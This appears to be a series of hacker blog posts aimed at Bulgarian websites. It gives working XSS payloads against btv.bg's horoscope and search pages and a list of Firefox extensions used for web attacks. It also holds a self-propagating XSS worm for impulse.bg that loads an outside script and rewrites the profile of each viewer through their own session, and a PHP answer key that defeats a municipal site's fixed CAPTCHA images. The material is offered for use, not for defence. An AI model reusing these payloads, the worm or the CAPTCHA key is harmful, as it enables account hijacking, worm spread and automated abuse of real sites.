new btv.bg: multiple XSS issues

new year, new site, new... XSSes
http://www.btv.bg/horoscope/daily_horoscope.pcgi?sign_id=
"][/img][/h3][script]alert('nigonized')[/script]<!--
(the leading quote and closing tags break out of the attribute and the surrounding img/h3 markup before the script; the trailing <!-- comments out whatever the page prints after the injected value)
search box XSS:
"][script]alert('nigonized')[/script]<!--
to be continued...

ff's grand sixteen (Firefox extensions)

HackBar [ https://addons.mozilla.org/en-US/firefox/addon/3899 ]
FireBug [ https://addons.mozilla.org/en-US/firefox/addon/1843 ]
Anonymouser [ https://addons.mozilla.org/en-US/firefox/addon/1415 ]
Whois [ https://addons.mozilla.org/en-US/firefox/addon/603 ]
Web Developer [ https://addons.mozilla.org/en-US/firefox/addon/60 ]
SwitchProxy Tool [ https://addons.mozilla.org/en-US/firefox/addon/125 ]
Foxy Proxy [ https://addons.mozilla.org/en-US/firefox/addon/2464 ]
Reload Every [ https://addons.mozilla.org/en-US/firefox/addon/115 ]
User Agent Switcher [ https://addons.mozilla.org/en-US/firefox/addon/59 ]
View Cookies [ https://addons.mozilla.org/en-US/firefox/addon/3587 ]
Modify Headers [ https://addons.mozilla.org/en-US/firefox/addon/967 ]
TiX Now! [ https://addons.mozilla.org/en-US/firefox/addon/3601 ]
Wmlbrowser [ https://addons.mozilla.org/en-US/firefox/addon/62 ]
XSSMe [ http://www.securitycompass.com/exploit_me/xssme/xssme-0.2.1.xpi ]
SQL [...]

worming impulse.bg

impulse.bg allows HTML in the "title" field, exactly as myspace.com does, with the small difference that here there are no restrictions at all.
The first thing that catches the eye is this:
GET /js/scriptaculous/scriptaculous.js
which by itself makes our job easier and prettier: script.aculo.us is built on Prototype, so any script we inject already has Ajax.Request available. Putting something like the following into the "Title" field:
{script src="www.mysite.com/impulse.js"}{/script}

impulse.js contents (the parameter names, including the misspelt "alchohol", are the site's own form fields):

// Form body of the profile-edit form. It re-submits the viewer's own profile
// with the same script tag in "title", so everyone who views an infected
// profile becomes a carrier.
var params = "name=wormy!&email=nigon.hacked.in%40gmail.com&country=1&city_id=5&" +
  "city=&birthday=11&birthmonth=8&birthyear=1980&gender=1&" +
  "search_gender=2&height=0&weight=0&eyes=0&hair=0&" +
  "occupation=0&smoke=1&alchohol=1&title=%3Cscript%20src" +
  "%3D%22http%3A%2F%2Fmysite.com/impulse.js%22%3E%3C%2Fscript%3E&" +
  "info=&msg_report=1&comment_report=1&" +
  "Submit=%D0%9F%D1%80%D0%BE%D0%BC%D0%B5%D0%BD%D0%B8";
// Prototype's Ajax.Request (already loaded by the site together with
// scriptaculous) sends the POST from the victim's browser, so the victim's
// session cookie goes with it and no credentials are needed.
var MyAjax = new Ajax.Request('/myinfo', {
  method: 'post',
  parameters: params
});
result:
on every visit [...]

kids... kindergartens... stupidity... fakery

demagoguery is on the move...
after this happened:
http://news.ibox.bg/news/id_2042186633
a CAPTCHA ("CAPCTHA") was introduced on the same site... well, yes, but no...
http://kg.sofia.bg/i/captcha/1-100.GIF
stupidity after stupidity... the CAPTCHA is a fixed pool of 100 images served at predictable URLs (1.GIF through 100.GIF), so one manual pass over them gives a permanent answer key. What happens once all the .gifs are transcribed (1-100... 20 minutes) into an array? I don't know... I don't understand...
<?php
// Answer key for the 100 CAPTCHA images, transcribed by hand; entry $i
// presumably answers the image served as ($i + 1).GIF.
$captchas = array(
  "T490", "25T4", "441T", "4984", "5500", "5561",
  "8597", "5T24", "1864", "2514", "T154", "2556",
  "4612", "3296", "64T0", "5354", "6000", "458T",
  "1190", "916T", "6082", "5819", "4102", "3169",
  "419T", "1014", "1355", "8566", "8829", "5045",
  "5580", "6268", "16T3", "4047", "3315", "3445",
  "T3T6", "4380", "8389", "4404", "235T", "4808",
  "1005", "9509", "T592", "5341", "64TT", "T316",
  "6159", "2127", "T965", "T223", "5522", "6333",
  "5832", "3122", "3916", "T839", "8695", "5433",
  "3T96", "8483", "8540", "9900", "2847", "T005",
  "4844", "6220", "8150", "616T", "TT30", "31TT",
  "3684", "9502", "2T96", "T965", "9281", "9989",
  "1026", "9026", "5668", "3911", "40T5", "4624",
  "TT64", "6039", "T985", "802T", "1294", "240T",
  "14TT", "TT14", "21T3", "998T", "2412", "8132",
  "4835", "890T", "2163", "5291"
);